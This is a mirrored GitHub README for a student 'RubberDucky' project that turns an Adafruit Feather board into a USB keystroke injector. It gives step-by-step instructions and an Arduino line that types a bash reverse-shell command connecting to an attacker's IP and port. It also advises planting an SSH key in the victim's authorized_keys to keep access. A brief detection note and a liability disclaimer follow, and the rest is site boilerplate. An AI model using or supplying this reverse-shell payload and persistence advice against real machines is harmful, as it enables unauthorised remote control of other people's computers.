GithubHelp home page GithubHelp logo

rubberduck's Introduction

RubberDucky

Summary:

Through the use of the netcat command our group was able to create a usb device that is capable of creating a backdoor into another users computer which is on the same network.

Hardware:

Adafruit Feather 32u4 Bluefruit LE More information can be found here

Process:

  • Change the ip address and port within the Arduino Sketch to the ip and port that you will be using on the host machine
  // Create rsh
  Keyboard.print("bash -i >& /dev/tcp/192.101.10.120/1337 0>&1 & disown");
  • Flash the Adafruit device with the sketch found in veitchDuck
  • Run the attack.sh file on the host machine
  • Plug the USB device into the target machine
  • Watch the target computer as a terminal is open, after the commmand has been entered and the terminal has closed you may remove the USB device and return the host machine
  • Congratulations you now have a rsh into another persons computer.
  • Once here the extensions are endless, however it may be best to add an additional back door to the targets computer for rentry. There are many ways this can be done one is to add a public ssh key to the targets authorized_keys file More on backdoors can be found here

Security Measures:

This Project exists to show how this type of attack can happen, in order to better protect yourself, you should never leave your computer unattended. When this hack has been carried out with the attack can be detected by looking at a task manager, creating a top session and looking for any bash sessions that are using more CPU power than they should be using. Currently a patch to this type of attack is being created.

Notes:

This device has been tested on Linux and Mac. The authors will not be held responsible for any blackhat hacking.

rubberduck's People

Contributors

droulard avatar quentinxs avatar

Stargazers

 avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.